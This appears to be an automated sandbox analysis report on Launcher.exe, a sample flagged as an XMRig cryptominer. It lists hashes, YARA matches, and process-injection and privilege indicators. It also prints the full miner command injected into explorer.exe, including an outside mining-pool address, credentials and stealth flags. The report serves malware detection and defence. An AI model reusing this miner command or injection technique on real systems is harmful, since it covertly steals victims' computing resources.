xmrig | cbda012d620efa7a827e45f4ddbb6af507754fb147235a40612f4c1ed4f6d11d

General

Target

Launcher.exe
Size

29.7MB
MD5

7ded96c9ac71dc40d73a1a60a5c48d3c
SHA1

6695920c8e41d9e4ddaf296a2ac93c5ba3867722
SHA256

cbda012d620efa7a827e45f4ddbb6af507754fb147235a40612f4c1ed4f6d11d
SHA512

24accdbd8fabbb43f79de5e1eb9c21a1e1a03b66c783ed72f7a935346195d3a9db4b975f7e69099b9a2e161a65db0380d49024c4f430b883a6b3c21ec2a5ebff
SSDEEP

786432:6EBB4AqPIPbM01lD1f+7bScfki1FENKGlpeL/e8h7iZyip:fWAZPbtDp+ui1MuTVi

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 20 IoCs

miner

resource	yara_rule
behavioral1/memory/2552-10-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2552-12-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2552-14-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2552-16-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2552-18-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2552-20-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2552-22-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2552-24-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2552-26-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2552-30-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2552-32-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2552-35-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2552-36-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2552-37-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2552-38-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2552-39-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2552-40-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2552-41-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2552-42-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2552-43-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2244 set thread context of 2552	2244	Launcher.exe	29

Suspicious behavior: EnumeratesProcesses 47 IoCs

pid	Process
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe
2552	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
472	Process not Found

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2244	Launcher.exe
Token: SeLockMemoryPrivilege	2552	explorer.exe
Token: SeLockMemoryPrivilege	2552	explorer.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2244 wrote to memory of 2552	2244	Launcher.exe	29
PID 2244 wrote to memory of 2552	2244	Launcher.exe	29
PID 2244 wrote to memory of 2552	2244	Launcher.exe	29
PID 2244 wrote to memory of 2552	2244	Launcher.exe	29
PID 2244 wrote to memory of 2552	2244	Launcher.exe	29
PID 2244 wrote to memory of 2552	2244	Launcher.exe	29
PID 2244 wrote to memory of 2552	2244	Launcher.exe	29
PID 2244 wrote to memory of 2552	2244	Launcher.exe	29
PID 2244 wrote to memory of 2552	2244	Launcher.exe	29
PID 2244 wrote to memory of 2552	2244	Launcher.exe	29
PID 2244 wrote to memory of 2552	2244	Launcher.exe	29
PID 2244 wrote to memory of 2552	2244	Launcher.exe	29
PID 2244 wrote to memory of 2552	2244	Launcher.exe	29
PID 2244 wrote to memory of 2552	2244	Launcher.exe	29
PID 2244 wrote to memory of 2552	2244	Launcher.exe	29
PID 2244 wrote to memory of 2552	2244	Launcher.exe	29

C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2244
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=7187597 --pass=terra --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2552

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2244-1-0x000000013FC40000-0x00000001419F6000-memory.dmp

Filesize
29.7MB

Download
memory/2244-0-0x000007FEF51F0000-0x000007FEF5BDC000-memory.dmp

Filesize
9.9MB

Download
memory/2244-2-0x000000001C000000-0x000000001C080000-memory.dmp

Filesize
512KB

Download
memory/2244-33-0x000007FEF51F0000-0x000007FEF5BDC000-memory.dmp

Filesize
9.9MB

Download
memory/2552-26-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-32-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-10-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-12-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-14-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-16-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-18-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-20-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-22-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-24-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-6-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-28-0x000007FFFFFD6000-0x000007FFFFFD7000-memory.dmp

Filesize
4KB

Download
memory/2552-30-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-8-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-4-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-34-0x0000000000070000-0x0000000000090000-memory.dmp

Filesize
128KB

Download
memory/2552-35-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-36-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-37-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-38-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-39-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-40-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-41-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-42-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2552-43-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download

Analysis

Sharing